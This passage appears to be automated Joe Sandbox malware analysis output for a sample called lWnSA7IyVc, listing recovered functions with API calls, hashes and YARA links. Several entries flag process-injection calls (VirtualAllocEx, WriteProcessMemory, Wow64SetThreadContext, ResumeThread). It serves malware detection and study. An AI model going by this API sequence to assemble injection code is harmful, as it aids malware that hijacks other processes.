                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00A7B51E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1684292540.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_a70000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                  • Opcode ID: 4009d4a9c9cdf15e59a4a0e8eed759ed187ec04e5a416a6d09b8ab0c9e42cc3d
                                                                                                                                                  • Instruction ID: ef5a8a9b1dcb49f92231df834a9e2dfb1dbc3d6807131197183017671a4cd9ad
                                                                                                                                                  • Opcode Fuzzy Hash: 4009d4a9c9cdf15e59a4a0e8eed759ed187ec04e5a416a6d09b8ab0c9e42cc3d
                                                                                                                                                  • Instruction Fuzzy Hash: 1D8158B0A10B058FD724DF29D54579ABBF1FF88300F00892DE08ADBA51D775E949CBA1
                                                                                                                                                  Function 00A74544 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1043 a74544-a75e99 CreateActCtxA 1046 a75ea2-a75efc 1043->1046 1047 a75e9b-a75ea1 1043->1047 1054 a75efe-a75f01 1046->1054 1055 a75f0b-a75f0f 1046->1055 1047->1046 1054->1055 1056 a75f11-a75f1d 1055->1056 1057 a75f20 1055->1057 1056->1057 1059 a75f21 1057->1059 1059->1059
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00A75E89
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1684292540.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_a70000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                  • Opcode ID: 2a2c349fe1f48dade6753b565a573c12235365a38e5b7a8079ad516a75e35ea6
                                                                                                                                                  • Instruction ID: 5cbe26ed11c7424915bf5297b92439972df7e31cd02c8f8969bc63f6561ca5c8
                                                                                                                                                  • Opcode Fuzzy Hash: 2a2c349fe1f48dade6753b565a573c12235365a38e5b7a8079ad516a75e35ea6
                                                                                                                                                  • Instruction Fuzzy Hash: 5841C1B0C00719DFDB24DFA9C844B9EBBB5BF49304F24846AE408AB255DBB56945CF90
                                                                                                                                                  Function 00A75DCC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00A75E89
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1684292540.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_a70000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                  • Opcode ID: a42053cd5051708218f01dac557022b21877868674f6d3d6115f0f5068fc13ae
                                                                                                                                                  • Instruction ID: df417ba9e4ee660f4cfc1f2018e2304a2699c49ecf533d7a97659e18e86b7a8f
                                                                                                                                                  • Opcode Fuzzy Hash: a42053cd5051708218f01dac557022b21877868674f6d3d6115f0f5068fc13ae
                                                                                                                                                  • Instruction Fuzzy Hash: 5941F1B0C00619CFDB24CFA9C94479EBBB5BF49304F24846AE408AB265DBB56946CF90
                                                                                                                                                  Function 06987668 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3668623891-0
                                                                                                                                                  • Opcode ID: 38db3196c8b9e186325a830014d951544f0c2f3c82da49bf6b39a9c91dd681c3
                                                                                                                                                  • Instruction ID: 65ccfdf0c3f2720ff51dc99b202690ecc0f03ede952c44dd6f95e2525da3dd37
                                                                                                                                                  • Opcode Fuzzy Hash: 38db3196c8b9e186325a830014d951544f0c2f3c82da49bf6b39a9c91dd681c3
                                                                                                                                                  • Instruction Fuzzy Hash: 4B317A729043499FCB11DFA9D840AEEBFF8EF49310F14805AF954AB221C735A954DFA1
                                                                                                                                                  Function 069A9948 Relevance: 1.6, APIs: 1, Instructions: 75injectionCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069A99E0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                  • Opcode ID: 10db3caf675131c8875f6c84a70544f9ed4fd2229a26b61c72950b8c9d5b56dc
                                                                                                                                                  • Instruction ID: a8fa5a5c649c48935c0a70dca9018caf4637d8385f75d1460cf0a7cd6934c479
                                                                                                                                                  • Opcode Fuzzy Hash: 10db3caf675131c8875f6c84a70544f9ed4fd2229a26b61c72950b8c9d5b56dc
                                                                                                                                                  • Instruction Fuzzy Hash: D12168B69003499FCB10DFA9C881BDEBBF5FF88320F20842AE559A7251C7789544CBA5
                                                                                                                                                  Function 0698419C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,069867FD,?,?), ref: 069868AF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DrawText
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2175133113-0
                                                                                                                                                  • Opcode ID: 626d1c15789c500c1f462ba7c993578226df9ca846a1e06f2303d4c9af48bc2e
                                                                                                                                                  • Instruction ID: a0b046727c3e683ce2a2fd22945034b1bea33a398db2b0d9cc92152f444be532
                                                                                                                                                  • Opcode Fuzzy Hash: 626d1c15789c500c1f462ba7c993578226df9ca846a1e06f2303d4c9af48bc2e
                                                                                                                                                  • Instruction Fuzzy Hash: 2731E2B5D002099FDB10DF9AD884A9EBBF5FB48320F14842AE919A7310D774A944CFA0
                                                                                                                                                  Function 06986810 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,069867FD,?,?), ref: 069868AF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DrawText
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2175133113-0
                                                                                                                                                  • Opcode ID: 63c20a9024edfdd35448d026cc5808b26d92a14224d3598eb646128b04c582dd
                                                                                                                                                  • Instruction ID: faa74e1c241e3abca1d6206aa15f664c720c8e49db948edc17742391cce0c852
                                                                                                                                                  • Opcode Fuzzy Hash: 63c20a9024edfdd35448d026cc5808b26d92a14224d3598eb646128b04c582dd
                                                                                                                                                  • Instruction Fuzzy Hash: B831C2B5D002099FDB10DF9AD884ADEFBF5FB48320F24842AE819A7210D775A944CFA0
                                                                                                                                                  Function 069A9A38 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069A9AC0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                  • Opcode ID: c6efdf016bfe74c4be67fc06591fd810920dbc4d9d793eb6b055206b91f57076
                                                                                                                                                  • Instruction ID: 0b77bb8bda42f5ca41847a1894d3cefd77a8fd297ed5a602ef67dd7f3e3305cf
                                                                                                                                                  • Opcode Fuzzy Hash: c6efdf016bfe74c4be67fc06591fd810920dbc4d9d793eb6b055206b91f57076
                                                                                                                                                  • Instruction Fuzzy Hash: 172139B2C003599FCB10DFAAC841AEEBBF5FF48320F50842AE559A7250D7749540CBA4
                                                                                                                                                  Function 069A9950 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069A99E0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                  • Opcode ID: c724ec05fac284c82f4f38258ebaa43c9bf271f1ac08d3ceba9c5a5e010c44ca
                                                                                                                                                  • Instruction ID: 08f8e036cb1673154e8261cb4f8a4bed8a7bd4f90aa592617834980945130293
                                                                                                                                                  • Opcode Fuzzy Hash: c724ec05fac284c82f4f38258ebaa43c9bf271f1ac08d3ceba9c5a5e010c44ca
                                                                                                                                                  • Instruction Fuzzy Hash: 042127B19003599FCB10DFA9C985BDEBBF5FF88314F10842AE959A7250C7789944CBA4
                                                                                                                                                  Function 069A97B0 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069A9836
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                  • Opcode ID: d7896ddcf6589423bc99542be711008332ec11f0136164065ca4d01f1bc2b318
                                                                                                                                                  • Instruction ID: f40c2b6774238022aa473ccbd28b0b8c6089669c49ba61625871761ced635f53
                                                                                                                                                  • Opcode Fuzzy Hash: d7896ddcf6589423bc99542be711008332ec11f0136164065ca4d01f1bc2b318
                                                                                                                                                  • Instruction Fuzzy Hash: 442148B1D003098FCB10DFAAC4857EEBBF5EF88324F50842AD459A7241CB78A945CFA5
                                                                                                                                                  Function 00A7D308 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00A7D76E,?,?,?,?,?), ref: 00A7D82F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1684292540.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_a70000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: 47898849e513c33fe199f3e59d66c4dc7187bda0e725774dc6c3ca6b05c0f2e0
                                                                                                                                                  • Instruction ID: 60f425247312491279d743c036bb699a3ccdba6af642c60ac5cfe6a80ff36e38
                                                                                                                                                  • Opcode Fuzzy Hash: 47898849e513c33fe199f3e59d66c4dc7187bda0e725774dc6c3ca6b05c0f2e0
                                                                                                                                                  • Instruction Fuzzy Hash: 0F21E5B59002489FDB10DF99D984ADEBFF4FF48310F14841AE918A7311D374A940CFA5
                                                                                                                                                  Function 00A7D7A0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00A7D76E,?,?,?,?,?), ref: 00A7D82F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1684292540.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_a70000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: 83d0f2e3c0d167d97d73fe1c9ec7e9d90b45f5b03150bf2896e119616d0ce506
                                                                                                                                                  • Instruction ID: b6a4f4b3cf6e818fa9f72e801cd31ee9814425df3fc18d257078dac3510cc93e
                                                                                                                                                  • Opcode Fuzzy Hash: 83d0f2e3c0d167d97d73fe1c9ec7e9d90b45f5b03150bf2896e119616d0ce506
                                                                                                                                                  • Instruction Fuzzy Hash: 1321E4B5D002189FDB10CFAAD984ADEBFF4FB48320F14841AE958A7350D374A940CFA1
                                                                                                                                                  Function 069A97B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069A9836
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                  • Opcode ID: 28524402ead110488a697a3e0aa3453402ad344465d25e76a393f54236d75d1a
                                                                                                                                                  • Instruction ID: 0fe5f87e38924ee0186856a814ddac4558e719bdebd57a7e253227b3fdbdcbac
                                                                                                                                                  • Opcode Fuzzy Hash: 28524402ead110488a697a3e0aa3453402ad344465d25e76a393f54236d75d1a
                                                                                                                                                  • Instruction Fuzzy Hash: 802138B1D003098FDB10DFAAC4857EEBBF4EF88324F54842AD459A7241CB78A944CFA4
                                                                                                                                                  Function 069A9A40 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069A9AC0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                  • Opcode ID: c22605cc70620f31c60c2c0109bc0b0a755c35ab1a2df8e1de84efae86b7d1b6
                                                                                                                                                  • Instruction ID: 38bc8719c5c879e2373d535ada08f6988b7839f3b1675f2b6117e03e8ccb15c0
                                                                                                                                                  • Opcode Fuzzy Hash: c22605cc70620f31c60c2c0109bc0b0a755c35ab1a2df8e1de84efae86b7d1b6
                                                                                                                                                  • Instruction Fuzzy Hash: E82128B1D003599FCB10DFAAC880AEEFBF5FF48320F50842AE559A7250D7789544CBA4
                                                                                                                                                  Function 0698420C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06987682,?,?,?,?,?), ref: 06987727
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688296264.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6980000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFromIconResource
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3668623891-0
                                                                                                                                                  • Opcode ID: bd240b1c9a5326f6b28e59658f3109da15ac6703eb522d7bd3df350b3c6de336
                                                                                                                                                  • Instruction ID: e5d0b035bc62333e625b9bc02846843c545701f3d431c558ed75527f805e971a
                                                                                                                                                  • Opcode Fuzzy Hash: bd240b1c9a5326f6b28e59658f3109da15ac6703eb522d7bd3df350b3c6de336
                                                                                                                                                  • Instruction Fuzzy Hash: DA117CB1800349DFDB10DF9AD844BDEBFF8EB48320F14841AE555A7220C375A950DFA4
                                                                                                                                                  Function 069A9888 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069A98FE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 0487f462fe614b9a05b67cabe7002df6c0f6f5c93251735ea6f968e35453e0d0
                                                                                                                                                  • Instruction ID: e24128f34d621f20e4d819845f81cbb2d92ae4506dfaf388e6bf8e656d66e26f
                                                                                                                                                  • Opcode Fuzzy Hash: 0487f462fe614b9a05b67cabe7002df6c0f6f5c93251735ea6f968e35453e0d0
                                                                                                                                                  • Instruction Fuzzy Hash: 8A115972900249DFCB10DFA9C945AEEBFF5FB88324F248819E559A7260C7359540CFA0
                                                                                                                                                  Function 069A8E90 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 61d5e4e556732a979b4f602d2a40292e7ce22a59b6e385c88ecc113ddc7a6fec
                                                                                                                                                  • Instruction ID: e690905bc3e665480248e8d2ad70095d6e9dc816eff99f36f26ffe65f77d637b
                                                                                                                                                  • Opcode Fuzzy Hash: 61d5e4e556732a979b4f602d2a40292e7ce22a59b6e385c88ecc113ddc7a6fec
                                                                                                                                                  • Instruction Fuzzy Hash: EB1179B18003498FCB20DFAAC8457EEFBF4EB88324F208419D059A7210CA35A844CFA4
                                                                                                                                                  Function 069A9890 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069A98FE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: 79fa4458964235bf2b33dfbda528699007639feefcd236627a5a0b3223cfb148
                                                                                                                                                  • Instruction ID: a93eb6361774df864986db2063cb25a802b0907a8a47fde8f31dcd49ac690f12
                                                                                                                                                  • Opcode Fuzzy Hash: 79fa4458964235bf2b33dfbda528699007639feefcd236627a5a0b3223cfb148
                                                                                                                                                  • Instruction Fuzzy Hash: F51126729002499FCB10DFAAC944AEEBFF5EB88324F248419E559A7260CB75A544CFA4
                                                                                                                                                  Function 069ABED8 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 069ABF3D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  • Opcode ID: a624165ae8ca9a9f80a9f83ea97b3ddbcb25be14923ecd7c30247d5b1cc737ff
                                                                                                                                                  • Instruction ID: 9241d1e9197d36c9c3169304f4cc390a470e99c5f6fb0cacb36492fa0a67dcb3
                                                                                                                                                  • Opcode Fuzzy Hash: a624165ae8ca9a9f80a9f83ea97b3ddbcb25be14923ecd7c30247d5b1cc737ff
                                                                                                                                                  • Instruction Fuzzy Hash: 391110B58003489FCB10DF9AD985BDEBFF8EB48320F14845AE959A7211C775A584CFA1
                                                                                                                                                  Function 069A8E98 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  • Opcode ID: 530e8c8fccd9a7ab67cb04d6c448ac0ad0b78c3819f9351755357501f0dfc987
                                                                                                                                                  • Instruction ID: 9a474b553d6f3989c71b7a95d3bd843b93947ef881e4ac68d1bbbcb87fd252b7
                                                                                                                                                  • Opcode Fuzzy Hash: 530e8c8fccd9a7ab67cb04d6c448ac0ad0b78c3819f9351755357501f0dfc987
                                                                                                                                                  • Instruction Fuzzy Hash: C5113AB1D003498FCB20DFAAC9457EEFBF5EB88324F248419D559A7250CB75A944CF94
                                                                                                                                                  Function 00A7B4B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00A7B51E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1684292540.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_a70000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                  • Opcode ID: dc7a7a4f7aae74d625c3b003640da9b25dfd4b106b7201dd234446ce5e24e47b
                                                                                                                                                  • Instruction ID: b277a7dcb81482d78d3aab50259f5e2bc4fa78851dcd7563860c5c0cbfca3458
                                                                                                                                                  • Opcode Fuzzy Hash: dc7a7a4f7aae74d625c3b003640da9b25dfd4b106b7201dd234446ce5e24e47b
                                                                                                                                                  • Instruction Fuzzy Hash: 9011E0B6C002498FCB10DF9AD844BDEFBF4AB88324F14C46AD459A7210D379A545CFA5
                                                                                                                                                  Function 069A64D0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 069ABF3D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1688349357.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_69a0000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  • Opcode ID: 6f2de866ee25dbf13fc8fe0a539352e613bbc4b1f4507fe89fc38acc7f6327b6
                                                                                                                                                  • Instruction ID: 3f97b0761da03147997987e7408b6ad6afb3fba437fcf097b5510ff9cbe42384
                                                                                                                                                  • Opcode Fuzzy Hash: 6f2de866ee25dbf13fc8fe0a539352e613bbc4b1f4507fe89fc38acc7f6327b6
                                                                                                                                                  • Instruction Fuzzy Hash: 431136B5800308DFDB10DF89C845BEEBBF8EB48324F108459E519A7210C375A944CFE4
                                                                                                                                                  Function 0071D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683672473.000000000071D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0071D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_71d000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 543972220693874440b444a2657c4118d7eeb016d8c8fec9aee034ed5e19acb4
                                                                                                                                                  • Instruction ID: 7799d08335e250d30744359a0ccfcfff3907bcd26235cf906007aeee56099b75
                                                                                                                                                  • Opcode Fuzzy Hash: 543972220693874440b444a2657c4118d7eeb016d8c8fec9aee034ed5e19acb4
                                                                                                                                                  • Instruction Fuzzy Hash: 10212571500240DFCB25DF18D9C0B67BF66FB98318F20C569EC090B296C33ADCA6CAA1
                                                                                                                                                  Function 0072D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683835194.000000000072D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0072D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_72d000_lWnSA7IyVc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
